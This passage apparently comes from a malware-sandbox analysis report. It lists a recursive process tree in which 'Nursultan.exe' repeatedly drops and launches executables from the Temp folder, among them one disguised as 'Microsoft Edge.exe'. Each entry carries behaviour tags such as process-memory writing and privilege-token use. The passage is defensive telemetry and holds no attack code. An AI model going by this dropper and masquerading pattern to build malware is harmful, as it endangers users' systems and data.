- Suspicious use of WriteProcessMemory
PID:1472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
6⤵
- Suspicious use of WriteProcessMemory
PID:1364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
7⤵
PID:1600

C:\Windows\system32\cmd.exe
cmd
7⤵
PID:1108

C:\Windows\system32\chcp.com
chcp 65001
6⤵
PID:612

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
6⤵
- Delays execution with timeout.exe
PID:1500

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
6⤵
PID:2672

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1112

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2644

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
5⤵
- Executes dropped EXE
PID:324

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2724

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
5⤵
- Executes dropped EXE
PID:2216

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
6⤵
PID:1620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
7⤵
PID:1584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
8⤵
PID:2396

C:\Windows\system32\cmd.exe
cmd
8⤵
PID:356

C:\Windows\system32\chcp.com
chcp 65001
7⤵
PID:2528

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
7⤵
- Delays execution with timeout.exe
PID:2688

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
7⤵
PID:2104

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2280

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1844

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
6⤵
- Executes dropped EXE
PID:1324

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
5⤵
- Executes dropped EXE
PID:872

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
6⤵
- Executes dropped EXE
PID:1608

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
7⤵
PID:2460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
8⤵
PID:2352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
9⤵
PID:2428

C:\Windows\system32\cmd.exe
cmd
9⤵
PID:2984

C:\Windows\system32\chcp.com
chcp 65001
8⤵
PID:2648

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
8⤵
- Delays execution with timeout.exe
PID:2816

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
8⤵
PID:2056

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2416

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:992

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
7⤵
- Executes dropped EXE
PID:1136

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
6⤵
- Executes dropped EXE
PID:2440

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
7⤵
- Executes dropped EXE
PID:2120

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
8⤵
PID:760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
9⤵
PID:2556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
10⤵
PID:2268

C:\Windows\system32\cmd.exe
cmd
10⤵
PID:2580

C:\Windows\system32\chcp.com
chcp 65001
9⤵
PID:3048

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
9⤵
- Delays execution with timeout.exe
PID:1724

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
9⤵
PID:2636

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:696

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2360

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
8⤵
- Executes dropped EXE
PID:1048

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
7⤵
- Executes dropped EXE
PID:2452

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
8⤵
- Executes dropped EXE
PID:1580

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
9⤵
PID:1784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
10⤵
PID:1792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
11⤵
PID:948

C:\Windows\system32\cmd.exe
cmd
11⤵
PID:1552

C:\Windows\system32\chcp.com
chcp 65001
10⤵
PID:1524

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
10⤵
- Delays execution with timeout.exe
PID:1060

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
10⤵
PID:1960

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
9⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:712

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
9⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3036

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
9⤵
- Executes dropped EXE
PID:984

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
8⤵
- Executes dropped EXE
PID:2324

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
9⤵
- Executes dropped EXE
PID:612

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
10⤵
PID:3052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
11⤵
PID:992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
12⤵
PID:1684

C:\Windows\system32\cmd.exe
cmd
12⤵
PID:1740

C:\Windows\system32\chcp.com
chcp 65001
11⤵
PID:2844

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
11⤵
- Delays execution with timeout.exe
PID:1636

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
11⤵
PID:2876

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
10⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2100

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
10⤵
- Executes dropped EXE
PID:576

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
10⤵
- Executes dropped EXE
PID:1864

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
9⤵
- Executes dropped EXE
PID:2588

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
10⤵
- Executes dropped EXE
PID:2880

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
11⤵
PID:2016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
12⤵
PID:3020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
13⤵
PID:2056

C:\Windows\system32\cmd.exe
cmd
13⤵
PID:1652

C:\Windows\system32\chcp.com
chcp 65001
12⤵
PID:1304

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
12⤵
- Delays execution with timeout.exe
PID:324

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
12⤵
PID:2468

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
11⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1972

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
11⤵
- Executes dropped EXE
PID:2976

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
11⤵
- Executes dropped EXE
PID:1144

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
10⤵
- Executes dropped EXE
PID:1812

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
11⤵
- Executes dropped EXE
PID:3068

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
12⤵
PID:2916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
13⤵
PID:2028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
14⤵
PID:3004

C:\Windows\system32\cmd.exe
cmd
14⤵
PID:2796

C:\Windows\system32\chcp.com
chcp 65001
13⤵
PID:992

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
13⤵
- Delays execution with timeout.exe
PID:2676

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
13⤵
PID:1768

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
12⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2696

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
12⤵
- Executes dropped EXE
PID:872

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
12⤵
- Executes dropped EXE
PID:2156

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
11⤵
- Executes dropped EXE
PID:1108

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
12⤵
- Executes dropped EXE
PID:2836

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
13⤵
PID:2688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
14⤵
PID:1332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
15⤵
PID:2996

C:\Windows\system32\cmd.exe
cmd
15⤵
PID:1144

C:\Windows\system32\chcp.com
chcp 65001
14⤵
PID:1540

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
14⤵
- Delays execution with timeout.exe
PID:2344

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
14⤵
PID:2964

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
13⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1052

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
13⤵
- Executes dropped EXE
PID:408

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
13⤵
- Executes dropped EXE
PID:2816

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
12⤵
- Executes dropped EXE
PID:2936

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
13⤵
- Executes dropped EXE
PID:2356

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
14⤵
PID:3048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
15⤵
PID:1836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
16⤵
PID:2076

C:\Windows\system32\cmd.exe
cmd
16⤵
PID:1680

C:\Windows\system32\chcp.com
chcp 65001
15⤵
PID:1088

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
15⤵
- Delays execution with timeout.exe
PID:2808

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
15⤵
PID:1856

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
14⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1584

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
14⤵
- Executes dropped EXE
PID:880

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
14⤵
- Executes dropped EXE
PID:2820

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
13⤵
- Executes dropped EXE
PID:1348

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
14⤵
- Executes dropped EXE
PID:2136

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
15⤵
PID:2980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
16⤵
PID:2832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
17⤵
PID:2992

C:\Windows\system32\cmd.exe
cmd
17⤵
PID:2892

C:\Windows\system32\chcp.com
chcp 65001
16⤵
PID:2976

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
16⤵
- Delays execution with timeout.exe
PID:2196

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
16⤵
PID:408

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
15⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1684

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
15⤵
- Executes dropped EXE
PID:1108

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
15⤵
- Executes dropped EXE
PID:992

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
14⤵
- Executes dropped EXE
PID:764

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
15⤵
- Executes dropped EXE
PID:2624

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
16⤵
PID:1272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
17⤵
PID:2572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
18⤵
PID:1772

C:\Windows\system32\cmd.exe
cmd
18⤵
PID:1628

C:\Windows\system32\chcp.com
chcp 65001
17⤵
PID:2340

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
17⤵
- Delays execution with timeout.exe
PID:1652

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
17⤵
PID:2028

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
16⤵
- Suspicious behavior: EnumeratesProcesses
PID:1972

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
16⤵
PID:1508

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
16⤵
PID:1748

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
15⤵
- Executes dropped EXE
PID:3032

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
16⤵
PID:1688

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
17⤵
PID:2156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
18⤵
PID:2176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
19⤵
PID:816

C:\Windows\system32\cmd.exe
cmd
19⤵
PID:712

C:\Windows\system32\chcp.com
chcp 65001
18⤵
PID:764

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
18⤵
- Delays execution with timeout.exe
PID:892

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
18⤵
PID:2912

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
17⤵
- Suspicious behavior: EnumeratesProcesses
PID:2344

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
17⤵
PID:2408

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
17⤵
PID:1520

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
16⤵
PID:3060

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
17⤵
PID:2964

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
18⤵
PID:1864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
19⤵
PID:2440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
20⤵
PID:2404

C:\Windows\system32\cmd.exe
cmd
20⤵
PID:2396

C:\Windows\system32\chcp.com
chcp 65001
19⤵
PID:2624

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
19⤵
- Delays execution with timeout.exe
PID:2952

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
19⤵
PID:1600

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
18⤵
- Suspicious behavior: EnumeratesProcesses
PID:1972

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
18⤵
PID:376

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
18⤵
PID:884

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
17⤵
PID:2888

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
18⤵
PID:2468

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
19⤵
PID:2508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
20⤵
PID:1720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
21⤵
PID:2392

C:\Windows\system32\cmd.exe
cmd
21⤵
PID:1868

C:\Windows\system32\chcp.com
chcp 65001
20⤵
PID:2908

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
20⤵
- Delays execution with timeout.exe
PID:2876

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
20⤵
PID:2648

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
19⤵
- Suspicious behavior: EnumeratesProcesses
PID:2660

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
19⤵
PID:2608

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
19⤵
PID:1768

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
18⤵
PID:880

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
19⤵
PID:1792

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
20⤵
PID:2568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
21⤵
PID:1808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
22⤵
PID:2684

C:\Windows\system32\cmd.exe
cmd
22⤵
PID:1332

C:\Windows\system32\chcp.com
chcp 65001
21⤵
PID:1508

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
21⤵
- Delays execution with timeout.exe
PID:2828

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
21⤵
PID:2644

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
20⤵
- Suspicious behavior: EnumeratesProcesses
PID:1304

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
20⤵
PID:3060

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
20⤵
PID:1540

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
19⤵
PID:1256

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
20⤵
PID:408

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
21⤵
PID:864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
22⤵
PID:2232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
23⤵
PID:2988

C:\Windows\system32\cmd.exe
cmd
23⤵
PID:344

C:\Windows\system32\chcp.com
chcp 65001
22⤵
PID:2796

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
22⤵
- Delays execution with timeout.exe
PID:872

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
22⤵
PID:2356

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
21⤵
- Suspicious behavior: EnumeratesProcesses
PID:3020

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
21⤵
PID:1048

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
21⤵
PID:1744

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
20⤵
PID:2584

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
21⤵
PID:2744

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
22⤵
PID:2820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
23⤵
PID:2928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
24⤵
PID:1880

C:\Windows\system32\cmd.exe
cmd
24⤵
PID:2524

C:\Windows\system32\chcp.com
chcp 65001
23⤵
PID:1916

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
23⤵
- Delays execution with timeout.exe
PID:540

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
23⤵
PID:2624

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
22⤵
- Suspicious behavior: EnumeratesProcesses
PID:1820

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
22⤵
PID:2400

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
22⤵
PID:2280

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
21⤵
PID:2964

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
22⤵
PID:2256

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
23⤵
PID:2976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
24⤵
PID:2028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
25⤵
PID:2608

C:\Windows\system32\cmd.exe
cmd
25⤵
PID:2876

C:\Windows\system32\chcp.com
chcp 65001
24⤵
PID:2216

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
24⤵
- Delays execution with timeout.exe
PID:2636

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
24⤵
PID:356

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
23⤵
- Suspicious behavior: EnumeratesProcesses
PID:1808

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
23⤵
PID:948

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
23⤵
PID:1792

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
22⤵
PID:880

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
23⤵
PID:2364

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
24⤵
PID:2796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
25⤵
PID:2652

C:\Windows\system32\cmd.exe
